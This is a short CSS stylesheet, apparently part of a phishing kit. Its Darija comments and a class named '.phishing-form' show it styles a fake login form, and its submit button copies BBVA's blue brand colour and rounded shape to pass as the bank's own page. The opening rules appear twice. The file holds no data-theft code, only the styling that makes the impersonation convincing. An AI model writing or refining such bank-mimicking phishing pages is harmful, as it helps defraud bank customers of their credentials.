/* Hadi ghir bache l-form yban mzyan */
.phishing-form { 
    display: block; 
}

/* Span clickable */
.btn-clickable {
    cursor: pointer;
}
/* Hadi ghir bache l-form yban mzyan */
.phishing-form { 
    display: block; 
}

/* Span clickable */
.btn-clickable {
    cursor: pointer;
}

/* Button zra9 dyal BBVA */
#submitBtn {
    background-color: #004481 !important;
    color: #FFFFFF !important;
    border: none !important;
    border-radius: 100px !important;
    padding: 12px 32px !important;
    font-weight: bold !important;
    font-size: 16px !important;
    cursor: pointer !important;
    display: inline-flex !important;
    align-items: center !important;
    justify-content: center !important;
    min-height: 48px !important;
}
#submitBtn:hover {
    background-color: #003366 !important;
}
#submitBtn .c-button__text {
    color: #FFFFFF !important;
}